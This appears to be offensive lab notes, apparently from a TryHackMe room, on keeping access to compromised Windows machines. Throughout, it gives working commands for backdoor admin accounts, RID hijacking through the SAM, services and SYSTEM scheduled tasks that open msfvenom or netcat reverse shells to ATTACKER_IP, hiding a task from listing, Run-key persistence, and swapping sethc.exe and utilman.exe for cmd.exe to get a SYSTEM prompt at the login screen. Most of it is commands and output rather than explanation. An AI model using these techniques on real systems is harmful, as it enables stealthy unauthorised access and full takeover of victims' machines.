Windows Local Persistence¶
Windows Local Persistence is a technique used by attackers to maintain access to a system after they have compromised it.
Creating an Administrator Account¶
net localgroup administrators thmuser0 /add
This might look suspicious, so you can create a "Backup Operators" account instead. This group has the ability to read SAM and security files, which can be used to escalate privileges.
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
evil-winrm -i 10.10.194.124 -u thmuser1 -p Password321
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
RID Hijacking¶
Another method to gain administrative privileges without being an administrator is changing some registry values to make the operating system think you are the Administrator.
When a user is created, an identifier called Relative ID (RID) is assigned to them. The RID is simply a numeric identifier representing the user across the system. When a user logs on, the LSASS process gets its RID from the SAM registry hive and creates an access token associated with that RID. If we can tamper with the registry value, we can make windows assign an Administrator access token to an unprivileged user by associating the same RID to both accounts.
In any Windows system, the default Administrator account is assigned the RID = 500, and regular users usually have RID >= 1000.
To find the assigned RIDs for any user, you can use the following command:
C:\> wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount S-1-5-21-1966530601-3185510712-10604624-503
Guest S-1-5-21-1966530601-3185510712-10604624-501
thmuser1 S-1-5-21-1966530601-3185510712-10604624-1008
thmuser2 S-1-5-21-1966530601-3185510712-10604624-1009
thmuser3 S-1-5-21-1966530601-3185510712-10604624-1010
The RID is the last bit of the SID (1010 for thmuser3 and 500 for Administrator). The SID is an identifier that allows the operating system to identify a user across a domain, but we won't mind too much about the rest of it for this task.
Now we only have to assign the RID=500 to thmuser3. To do so, we need to access the SAM using Regedit. The SAM is restricted to the SYSTEM account only, so even the Administrator won't be able to edit it. To run Regedit as SYSTEM, we will use psexec, available in C:\tools\pstools in your machine:
C:\tools\pstools> PsExec64.exe -i -s regedit
From Regedit, we will go to HKLM\SAM\SAM\Domains\Account\Users where there will be a key for each user in the machine. Since we want to modify thmuser3, we need to search for a key with its RID in hex (1010 = 0x3F2). Under the corresponding key, there will be a value called F, which holds the user's effective RID at position 0x30:
Notice the RID is stored using little-endian notation, so its bytes appear reversed.
We will now replace those two bytes with the RID of Administrator in hex (500 = 0x01F4), switching around the bytes (F401):
The next time thmuser3 logs in, LSASS will associate it with the same RID as Administrator and grant them the same privileges.
Creating backdoor services¶
We can create and start a service named "THMservice" using the following commands:
sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice
Or create a service that runs a reverse shell:
user@AttackBox$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
Then run the following commands on the target machine:
sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2
Scheduled Tasks¶
C:\> schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4444" /ru SYSTEM
The previous command will create a "THM-TaskBackdoor" task and execute an nc64 reverse shell back to the attacker. The /sc and /mo options indicate that the task should be run every single minute. The /ru option indicates that the task will run with SYSTEM privileges.
Check the task is running:
C:\> schtasks /query /tn thm-taskbackdoor
Making the Task Invisible¶
To make the task invisible, you can use the following command:
C:\> reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\THM-TaskBackdoor" /v SD /f
Logon Triggered Persistence¶
Startup folder¶
Each user has a folder under C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup where you can put executables to be run whenever the user logs in. An attacker can achieve persistence just by dropping a payload in there. Notice that each user will only run whatever is available in their folder.
If we want to force all users to run a payload while logging in, we can use the folder under C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp in the same way.
Run / RunOnce Registry Keys¶
HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
psexec -s -i reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyApp" /t REG_SZ /d "c:\windows\shell.exe" /f
Backdooring the Login Screen / RDP¶
C:\> takeown /f c:\Windows\System32\sethc.exe
SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "PURECHAOS\Administrator".
C:\> icacls C:\Windows\System32\sethc.exe /grant Administrator:F
processed file: C:\Windows\System32\sethc.exe
Successfully processed 1 files; Failed processing 0 files
C:\> copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Overwrite C:\Windows\System32\sethc.exe? (Yes/No/All): yes
1 file(s) copied.
Press Shift 5 times to open a command prompt with SYSTEM privileges.
Or you can replace utilman.exe with cmd.exe to open a command prompt from the login screen.
C:\> takeown /f c:\Windows\System32\utilman.exe
SUCCESS: The file (or folder): "c:\Windows\System32\utilman.exe" now owned by user "PURECHAOS\Administrator".
C:\> icacls C:\Windows\System32\utilman.exe /grant Administrator:F
processed file: C:\Windows\System32\utilman.exe
Successfully processed 1 files; Failed processing 0 files
C:\> copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
Overwrite C:\Windows\System32\utilman.exe? (Yes/No/All): yes
1 file(s) copied.